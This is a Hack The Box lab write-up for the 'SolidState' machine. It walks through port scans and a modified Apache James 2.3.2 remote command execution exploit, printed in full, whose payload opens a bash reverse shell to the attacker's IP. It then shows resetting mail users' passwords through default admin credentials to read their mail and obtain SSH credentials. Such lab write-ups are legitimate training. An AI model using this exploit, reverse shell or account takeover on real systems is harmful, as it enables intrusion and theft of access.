HacktheBox 'SolidState' writeup
‘SolidState’ HTB Writeup
Host Information
| Hostname | IP Address | Operating System | Difficulty Level |
| SolidState | 10.10.10.51 | Linux | Medium |
Writeup Contents:
(you can jump to the section using these links)
Initial Recon
Again, we start with our initial recon of the target system. We’ll use the same enumeration automation script we used on a few other recent boxes - nmapAutomator. You can find and download the script here on Github.
Let’s run a full scan against the target:
root@kali:/writeups/HTB/solidstate/enumeration# nmapAutomator.sh 10.10.10.51 all
Running a all scan on 10.10.10.51
---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:02 CST
Nmap scan report for 10.10.10.51
Host is up (0.044s latency).
Not shown: 959 closed ports, 40 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
119/tcp open nntp
Nmap done: 1 IP address (1 host up) scanned in 5.65 seconds
---------------------Starting Nmap Basic Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:02 CST
Nmap scan report for 10.10.10.51
Host is up (0.046s latency).
PORT STATE SERVICE VERSION
119/tcp open nntp JAMES nntpd (posting ok)
Service Info: Host: solidstate
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds
----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:02 CST
Warning: 10.10.10.51 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.51
Host is up (0.039s latency).
All 1000 scanned ports on 10.10.10.51 are open|filtered (950) or closed (50)
Nmap done: 1 IP address (1 host up) scanned in 45.23 seconds
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:03 CST
Initiating Parallel DNS resolution of 1 host. at 15:03
Completed Parallel DNS resolution of 1 host. at 15:03, 0.01s elapsed
Initiating SYN Stealth Scan at 15:03
Scanning 10.10.10.51 [65535 ports]
Discovered open port 80/tcp on 10.10.10.51
Discovered open port 110/tcp on 10.10.10.51
Discovered open port 25/tcp on 10.10.10.51
Discovered open port 22/tcp on 10.10.10.51
SYN Stealth Scan Timing: About 23.24% done; ETC: 15:05 (0:01:42 remaining)
SYN Stealth Scan Timing: About 46.49% done; ETC: 15:05 (0:01:10 remaining)
Discovered open port 4555/tcp on 10.10.10.51
SYN Stealth Scan Timing: About 69.37% done; ETC: 15:05 (0:00:40 remaining)
Discovered open port 119/tcp on 10.10.10.51
Completed SYN Stealth Scan at 15:05, 131.23s elapsed (65535 total ports)
Nmap scan report for 10.10.10.51
Host is up (0.042s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 131.34 seconds
Raw packets sent: 65595 (2.886MB) | Rcvd: 65535 (2.621MB)
Making a script scan on extra ports: 22, 25, 80, 110, 4555
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:05 CST
Nmap scan report for 10.10.10.51
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.50 [10.10.14.50]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.23 seconds
---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on all ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:06 CST
Nmap scan report for 10.10.10.51
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp open smtp JAMES smtpd 2.3.2
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
| vulners:
| cpe:/a:apache:http_server:2.4.25:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
|_ CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds
Running Vuln scan on all ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:06 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.51
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
25/tcp open smtp JAMES smtpd 2.3.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown:
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.51
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.51:80/
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/about.html
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/services.html
| Form id: name
| Form action: #
|
| Path: http://10.10.10.51:80/index.html
| Form id: name
|_ Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /README.txt: Interesting, a readme.
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'
|_http-server-header: Apache/2.4.25 (Debian)
| http-sql-injection:
| Possible sqli for queries:
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|_ http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.25:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-7659 5.0 https://vulners.com/cve/CVE-2017-7659
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763
|_ CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
110/tcp open pop3 JAMES pop3d 2.3.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
119/tcp open nntp JAMES nntpd (posting ok)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
4555/tcp open james-admin JAMES Remote Admin 2.3.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.99 seconds
---------------------Recon Recommendations----------------------
Web Servers Recon:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.51:80 -o recon/gobuster_10.10.10.51_80.txt
nikto -host 10.10.10.51:80 | tee recon/nikto_10.10.10.51_80.txt
Which commands would you like to run?
All (Default), gobuster, nikto, Skip <!>
Running Default in (1) s:
---------------------Running Recon Commands----------------------
Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.51:80
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/02/01 15:07:54 Starting gobuster
===============================================================
http://10.10.10.51:80/.htaccess (Status: 403) [Size: 295]
http://10.10.10.51:80/.htaccess.html (Status: 403) [Size: 300]
http://10.10.10.51:80/.htaccess.php (Status: 403) [Size: 299]
http://10.10.10.51:80/.htpasswd (Status: 403) [Size: 295]
http://10.10.10.51:80/.htpasswd.php (Status: 403) [Size: 299]
http://10.10.10.51:80/.htpasswd.html (Status: 403) [Size: 300]
http://10.10.10.51:80/.hta (Status: 403) [Size: 290]
http://10.10.10.51:80/.hta.html (Status: 403) [Size: 295]
http://10.10.10.51:80/.hta.php (Status: 403) [Size: 294]
http://10.10.10.51:80/about.html (Status: 200) [Size: 7161]
http://10.10.10.51:80/assets (Status: 301) [Size: 311]
http://10.10.10.51:80/images (Status: 301) [Size: 311]
http://10.10.10.51:80/index.html (Status: 200) [Size: 7774]
http://10.10.10.51:80/index.html (Status: 200) [Size: 7774]
http://10.10.10.51:80/server-status (Status: 403) [Size: 299]
http://10.10.10.51:80/services.html (Status: 200) [Size: 8398]
===============================================================
2020/02/01 15:08:32 Finished
===============================================================
Finished gobuster scan
=========================
Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.51
+ Target Hostname: 10.10.10.51
+ Target Port: 80
+ Start Time: 2020-02-01 15:08:32 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 1e60, size: 5610a1e7a4c9b, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2020-02-01 15:14:08 (GMT-6) (336 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan
=========================
---------------------Finished all Nmap scans---------------------
Completed in 11 minute(s) and 36 second(s)
OK, interesting, looks like we have a number of things we can look at - HTTP and SSH are open on their standard ports, and we also have a SMTP service running, as well as a Network News Transfer Protocol, POP3, and a James Remote Admin port. Let’s check out HTTP first, to see if there are any clues, then we can work our way through each of these services to see if there are known exploits, if not. We know that we’re running Apache 2.4.25 on Debian Linux.
checking out HTTP
Upon visiting the swebsite on port 80, we’re greeted with a pretty slick dynamic looking web page:
There doesn’t seem to be anything super obvious on the website that might serve as a hint; there’s a few fields that could potentially provide avenues for XSS or SQLi, but let’s keep enumerating for now. Nothing of interest seemed to show up in the images or assets directories, and the README.txt just confirms that the site is HTML5 and gives some copyright notices. Let’s move on.
checking out James Remote Admin
Let’s take a look at the James Remote Admin port next, as I’m not familiar with what that does. I’m guessing this has to do something with remote mail/tool suite adminstration, as both the SMTP and POP3 and NNTP were labled as James. A quick search seems to indicate that this is an Apache suite of tools.
A quick searchsploit search for the James version shown by nmap reveals only one result:
oot@kali:/writeups/HTB/solidstate/enumeration# searchsploit james 2.3.2
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apache James Server 2.3.2 - Remote Command Execution | exploits/linux/remote/35513.py
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
A quick look at the code with searchsploit -x seems to reveal it to be an authenticated remote command execution explioit - that’s a bummer, as we don’t have credentials. Looks like there’s a default of root / root provided in the exploit, so we can go ahead and try that on the off-chance that the service suite has default (or easy to guess) credentials enabled. If not, we’ll either have to find a way to get likely credentials (from the Apache HTTP server, or another service) or try another exploit.
running an initial exploit
Let’s go ahead and download the exploit locally.
Exploit: Apache James Server 2.3.2 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/35513
Path: /usr/share/exploitdb/exploits/linux/remote/35513.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /writeups/HTB/solidstate/exploits/35513.py
root@kali:/writeups/HTB/solidstate/exploits# mv 35513.py james_rce.py
Looks like there are two options within the exploit - one to run the payload as root, the others to deliver the payload as any user. Since we don’t know what user we’ll log in as let’s put the payload delivery as any user. Looks like the default apache james remote management credentials root/root are already provided, and that’s the only credentials we’re aware of, so let’s leave that. By default it looks like the payload is placing a proof.txt file in either /root/proof.txt for root, or /tmp/proof.txt for any user. So let’s modify that file creation to throw a reverse shell.
Here’s the code for our modified exploit:
#!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d
import socket
import sys
import time
# specify payload
payload = 'bash -i >& /dev/tcp/10.10.14.50/43110 0>&1' # to exploit on any user
#payload = '[ "$(id -u)" == "0" ] && bash -i >& /dev/tcp/10.10.14.50/43110 0>&1' # to exploit only on root
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'
if len(sys.argv) != 2:
sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
sys.exit(1)
ip = sys.argv[1]
def recv(s):
s.recv(1024)
time.sleep(0.2)
try:
print "[+]Connecting to James Remote Administration Tool..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,4555))
s.recv(1024)
s.send(user + "\n")
s.recv(1024)
s.send(pwd + "\n")
s.recv(1024)
print "[+]Creating user..."
s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
s.recv(1024)
s.send("quit\n")
s.close()
print "[+]Connecting to James SMTP server..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,25))
s.send("ehlo team@team.pl\r\n")
recv(s)
print "[+]Sending payload..."
s.send("mail from: <'@team.pl>\r\n")
recv(s)
# also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found
s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
recv(s)
s.send("data\r\n")
recv(s)
s.send("From: team@team.pl\r\n")
s.send("\r\n")
s.send("'\n")
s.send(payload + "\n")
s.send("\r\n.\r\n")
recv(s)
s.send("quit\r\n")
recv(s)
s.close()
print "[+]Done! Payload will be executed once somebody logs in."
except:
print "Connection failed."
OK, let’s go ahead and start a listener locally with nc -lvnp 43110 to catch our shell, on the off-chance the default creds actually work.
Now let’s give it a run:
root@kali:/writeups/HTB/solidstate/exploits# python james_rce.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
OK, so that actually might have worked; at the least, it didn’t error out, which probably means the default credentials worked. However, we notice the payload won’t be executed until somebody logs in. Let’s see if we can log in to the adminstration port, or another James service (such as SMTP or POP3) with root / root ourselves, to see if we can find a way further into the system to have the payload run.
Looks like going to the remote adminstration port over a browser doesn’t load.
a slight misstep
Let’s try another service to see if we can authenticate. I seem to remember that SMTP by default can be accessed via telnet, so let’s try that first. I don’t remember the exact syntax, I think you have to somehow send a SYN type message to the server first, then authenticate. A quick search turns up a pretty good guide on how to authenticate over telnet. Let’s go ahead and connect to and greet the server:
root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 25
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Sun, 2 Feb 2020 14:51:58 -0500 (EST)
EHLO 10.10.10.51
250-solidstate Hello 10.10.10.51 (10.10.14.50 [10.10.14.50])
250-PIPELINING
250 ENHANCEDSTATUSCODES
OK, now it looks like we need to base64 encode our crendetials before passing them with AUTH LOGIN. Since our username and password is the same, we just need to run the following in a new local shell:
root@kali:~# echo "root" | base64
cm9vdAo=
Now let’s give passing the creds to SMTP a shot:
root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 25
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Sun, 2 Feb 2020 14:58:02 -0500 (EST)
EHLO 10.10.10.51
250-solidstate Hello 10.10.10.51 (10.10.14.50 [10.10.14.50])
250-PIPELINING
250 ENHANCEDSTATUSCODES
AUTH LOGIN
334 VXNlcm5hbWU6
cm9vdAo=
334 UGFzc3dvcmQ6
cm9vdAo=
535 Authentication Failed
Bummer, that didn’t seem to work.
finding further information through compromised accounts
Let’s try something else. Let’s see if we can log directly in to the remote administration port with telnet:
root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
OK, that was a lot more straightforward, I probably should have tried that first.
It looks like the listener has not caught a shell. But taking another look at the exploit, it looks like it used SMTP to send the payload, so we’ll probably need to log in as a user to the POP3 service, in order for the payload to fire. Let’s see what we can do anything further with the James Remote Adminstration login. There seems to be a good list of valid James Remote Amin commands on this site, so let’s see if we can list the users, change a password for one, then log in as them to POP3, to see if that causes the listener to get a shell.
root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
OK, looks like we got a list of users. and looks like the user showing as bash_completion.d is an artifact of the RCE exploit we ran earlier. Let’s try to change Thomas’s credentials and log in as him to POP3.
root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
setpassword thomas letmein
Password for thomas reset
OK, now let’s see if we can use POP3 similar to SMTP, and log in as thomas over telnet.
root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER thomas
+OK
PASS letmein
+OK Welcome thomas
Awesome, it worked, we’re connected as Thomas. No shell on netcat, Maybe the RCE paylaod will get fired on an login to the server itself, such as using ssh; that might make more sense. Let’s see if we can read some emails, if there’s any, to find further clues. Maybe a hint on how to log in to the server. Changing thomas’s password only changed it for the POP3 service, not the server itself, so we’ll need different creds if we’re going to SSH. Using the LIST command in POP3, it looks like Thomas has no emails:
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER thomas
+OK
PASS letmein
+OK Welcome thomas
LIST
+OK 0 0
.
Let’s go through each user and reset their password, like above, log in, and see if we can find anything; if not, we’ll have to try a different avenue.
After resetting john’s password, and logging in to his mailbox, we see a promising clue:
root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user john
+OK
pass letmein
+OK Welcome john
list
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
James
.
Great, so maybe Mindy will have access to the server; if we can ssh as her, hopefully the exploit will fire off and give us a shell on the box. Let’s go ahead and reset her POP3 credentials, and see if there’s any emails in her account:
root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
setpassword mindy getmeashell
Password for mindy reset
^]
telnet> Connection closed.
root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass getmeashell
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.
^]
telnet> Connection closed.
Awesome, looks like we have some credentials that might work. Let’s try ssh’ing into the box as mindy with the creds mindy / P@55W0rd1!2@ . If this works, like it said in the email, our access as Mindy will likely be limited, so let’s hope the James RCE exploit works, fires off the payload, and gives us a less restrictive shell.
Let’s check it out.
gaining a foothold
getting a user shell
Let’s try logging in as Mindy on ssh:
root@kali:/writeups/HTB/solidstate/exploits# ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: @team.pl>
Message-ID: <11099374.0.1580672353999.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.50 ([10.10.14.50])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 97
for <../../../../../../../../etc/bash_completion.d@localhost>;
Sun, 2 Feb 2020 14:39:13 -0500 (EST)
Date: Sun, 2 Feb 2020 14:39:13 -0500 (EST)
From: team@team.pl
: No such file or directory
-rbash: $'\r': command not found
Awesome, looks like it worked.
Checking our netcat listener to see if we got another shell, it looks like we did:
root@kali:~# nc -lvnp 43110
listening on [any] 43110 ...
